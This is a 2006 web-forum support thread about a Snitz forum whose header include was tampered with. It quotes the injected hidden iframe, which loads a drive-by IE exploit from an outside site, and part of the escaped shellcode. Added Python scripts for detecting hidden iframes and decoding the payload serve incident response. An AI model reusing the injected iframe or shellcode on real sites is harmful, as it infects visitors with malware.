paypaldev
Starting Member
10 Posts
Posted - 24 March 2006 : 10:17:08
Hey all, hoping to get some insight here... I went to my forum today at http://www.paypaldev.org and my browser closed. Not thinking anything of it (weird), I went back to the page, whereupon my browser started throwing critical errors. I Ctrl-Alt-Del out of IE and find a program on my desktop named "ver_prada.exe" (0 Google hits). It then looks like something is up. I log into the FTP site and see that the inc_header.asp file was updated today. I uploaded my copy and downloaded the one up there. Sure enough, it had a line:
<iframe src="http://elogiks.com/file.php" height="0" width="0"></iframe>
Obviously, that is not supposed to be there. It links to an Asian site. Not fun.
Anyway, I realize there are newer versions of the boards out that may fix the hole that created this, but I'd be more interested to hear what method was used (injection?) to edit/write to my inc_header file.
Thanks. Please feel free to contact me directly. admin...@...paypaldev...dot...org
We are running Snitz Forums 2000 Version 3.4.03.
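The tampering described in this post (a zero-size iframe spliced into a server-side include) is the classic drive-by pattern, and the two checks that would have caught it immediately are a file-integrity baseline and a scan for invisible iframes. The following is an added example, not part of the original thread and not Snitz code; the file names and the "clean" header content are constructed, the injected iframe line is the one quoted above, and the attribute parser is deliberately simple (it handles double-quoted, single-quoted and unquoted values but not full HTML).

```python
import hashlib
import re

# Constructed sample files: a header include as it might ship, and the same file
# with the hidden iframe line quoted in the post spliced in by an attacker.
CLEAN_HEADER = '<div id="header"><a href="default.asp">Forum home</a></div>\n'
TAMPERED_HEADER = (
    CLEAN_HEADER
    + '<iframe src="http://elogiks.com/file.php" height="0" width="0"></iframe>\n'
)

IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')


def iframe_attrs(tag):
    """Parse name=value attributes from one tag (double-, single- or unquoted values)."""
    attrs = {}
    for m in ATTR.finditer(tag):
        name = m.group(1).lower()
        attrs[name] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def hidden_iframes(html):
    """Return the src of every iframe a visitor would never see: zero-sized,
    hidden with CSS, or pushed far off-screen."""
    hits = []
    for tag in IFRAME_TAG.findall(html):
        a = iframe_attrs(tag)
        zero = {a.get("height", ""), a.get("width", "")} & {"0", "0px"}
        style = a.get("style", "").replace(" ", "").lower()
        css_hidden = "display:none" in style or "visibility:hidden" in style
        off_screen = bool(re.search(r"(left|top):-\d{3,}", style))
        if zero or css_hidden or off_screen:
            hits.append(a.get("src", "(no src)"))
    return hits


def sha256_of(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def build_baseline(files):
    """files: {path: content}. Record hashes right after a clean install or upgrade."""
    return {path: sha256_of(content) for path, content in files.items()}


def audit(files, baseline):
    """Compare the current files with the baseline and flag hidden iframes in each."""
    report = {}
    for path, content in files.items():
        report[path] = {
            "changed": baseline.get(path) != sha256_of(content),
            "hidden_iframes": hidden_iframes(content),
        }
    return report


if __name__ == "__main__":
    good = build_baseline({"inc_header.asp": CLEAN_HEADER})
    for path, result in audit({"inc_header.asp": TAMPERED_HEADER}, good).items():
        print(path, result)
```

Run the baseline once against a known-clean copy of the forum files and re-run the audit on a schedule (or after any unexplained change), reading the real files from disk in place of the constructed strings. A changed hash on a file that should never change, such as an include that no admin edited, is the alert; the iframe scan is the quick triage of what changed.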
ruirib
Snitz Forums Admin
Portugal
26364 Posts
Podge
Support Moderator
Ireland
3775 Posts
paypaldev
Starting Member
10 Posts
Posted - 24 March 2006 : 18:19:23
Yeah, I have to agree at this point. Just checked the write permissions. Could not find an issue. Somehow, they got the file altered again just now. I changed it. Ugh.
paypaldev
Starting Member
10 Posts
Posted - 24 March 2006 : 18:29:12
To follow up. It appears the site is taking advantage of the MS IE bug just announced yesterday having to do with radio/checkboxes: http://www.prweb.com/releases/2006/3/prweb362972.htm
Accessing the URL with FF you get to the page with a checkbox on it and a source of (I assume it writes the file out to the desktop):
Code removed by Davio.
Davio
Development Team Member
Jamaica
12217 Posts
Posted - 24 March 2006 : 20:57:10
Try posting the code in a text file and a link to it here. The code stretches the page too wide and makes the topic hard to read.
I opened the page in FF also, and it froze FF for a few minutes. Whatever calculations it was trying to do took a whole lot out of my system. Pagefile size rose to 1 GB.
Not sure exactly what the javascript is doing though. But somehow this guy is getting on your server and editing the files.
Have you kept up with all the security patches for the forum?
Support Snitz Forums
ruirib
Snitz Forums Admin
Portugal
26364 Posts
Posted - 24 March 2006 : 21:03:51
If I understood correctly, the IE bug would not be usable to change a file in your server, unless someone using IE from your server visited a link prepared to use the exploit. Again, as I stated before, any Snitz hack wouldn't allow changing files at the server. You don't have a file upload mod installed in your forum, do you?
Snitz 3.4 Readme | Like the support? Support Snitz too
Davio
Development Team Member
Jamaica
12217 Posts
Posted - 25 March 2006 : 15:25:02
I took a look at the javascript and tried to debug it to see what it is doing. The output of the javascript function reveals this:
" <input type=\"checkbox\" id=\"blah\">\n<SCRIPT language=\"javascript\">\nshellcode = unescape(\"%u4343%u4343%u54EB%u758B%u8B3C%u3574%u0378\"+\n \"%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33\"+\n \"%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03\"+\n \"%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD\"+\n \"%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5\"+\n \"%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A\"+\n \"%u2e55%u7865%u0065%uC033%u0364%u3040%u0C78\"+\n \"%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B\"+\n \"%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC\"+\n \"%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0\"+\n \"%uBF50%u1A"
I did a Google search for "nshellcode" and the only results returned were proof-of-concept code for many buffer overflows and exploits in various programs.
The output javascript seems incomplete. Trying to unescape revealed more jargon:
CC\xEB\x8B<tx \xF5\x8B\xF5\xC9A3 6\xBE(\xF2\b\xCB\x03 @\xEF\xDF\xE7\x8B$\xDD \x8BK^\x03\x8B\xC5 ulo.l Uee3d@x \x8B\fp\xAD@\xEB\x8B 4@\x8B<\xBFN\xEC \x84\xFF\x83\x04,<\xD0 P%u1A
But whatever it is, it's not something good.
Support Snitz Forums
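The unescape attempt in the post above produced gibberish like "ulo.l Uee3d@x" because JavaScript's unescape() turns each %uXXXX into one 16-bit character, and printing those characters shows only their high halves. In memory the browser stores each unit little-endian, low byte first, so reading the decoded units bytewise is what exposes the embedded strings. The script below is an added example for triaging such a captured payload; it is not code from the thread or from Snitz. The escaped string is the one quoted in the post, including its cut-off trailing "%u1A", so the decoder also has to report a truncated escape instead of silently dropping it; the minimum string length of 4 is an arbitrary choice.

```python
import re

# Constructed from the %u-escaped string quoted in the post above; it ends with the
# same truncated "%u1A" the post shows, so the decoder must cope with a cut-off escape.
SHELLCODE_ESCAPED = (
    "%u4343%u4343%u54EB%u758B%u8B3C%u3574%u0378"
    "%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33"
    "%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03"
    "%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD"
    "%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5"
    "%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A"
    "%u2e55%u7865%u0065%uC033%u0364%u3040%u0C78"
    "%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B"
    "%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC"
    "%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0"
    "%uBF50%u1A"
)

ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def decode_js_escapes(text):
    """Turn unescape()-style input into the bytes a browser would hold in memory.
    %uXXXX is one 16-bit code unit stored little-endian (low byte first), %XX is
    one byte, anything else is a literal character. Returns (data, unparsed_tail);
    the tail is non-empty when the input ends in a malformed or cut-off escape."""
    out = bytearray()
    pos = 0
    while pos < len(text):
        m = ESCAPE.match(text, pos)
        if m:
            if m.group(1) is not None:
                unit = int(m.group(1), 16)
                out += bytes((unit & 0xFF, unit >> 8))
            else:
                out.append(int(m.group(2), 16))
            pos = m.end()
        elif text[pos] == "%":
            # A "%" that starts no valid escape: report the remainder rather than guess.
            return bytes(out), text[pos:]
        else:
            out.append(ord(text[pos]) & 0xFF)
            pos += 1
    return bytes(out), ""


def printable_strings(data, min_len=4):
    """Runs of printable ASCII, the same idea as the Unix strings(1) tool."""
    found, run = [], bytearray()
    for b in data:
        if 0x20 <= b <= 0x7E:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:
        found.append(run.decode("ascii"))
    return found


def triage(escaped):
    """Summary a responder wants first: size, whether the capture is complete, and IoCs."""
    data, tail = decode_js_escapes(escaped)
    return {"bytes": len(data), "truncated_tail": tail, "strings": printable_strings(data)}


if __name__ == "__main__":
    print(triage(SHELLCODE_ESCAPED))
```

On this input the strings come out as "CCCC" (the padding at the start), "urlmon.dll" and "C:\U.exe": a library name associated with downloading and a local drop path, which is exactly the kind of indicator to hand to whoever is checking the affected workstations, without needing to understand the machine code around them.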
revdarkwing
Starting Member
Slovenia
7 Posts
Posted - 09 April 2006 : 01:42:21
Greetings, I am just learning how to install a forum on my website and noticed this thread and became concerned. Are attacks on a forum of this nature commonplace or is this a freak occurrence? It's hard enough trying to figure out how to install this on my site and it would be a pity if it turned out to be an invitation to malware or other problems. I want to do my own forum vs using one of those provider sites because I want to put as much of the forum into non-English as possible and I thought this would be the best way, if I could learn how to do it. Thanks
Bassman
Junior Member
Netherlands
256 Posts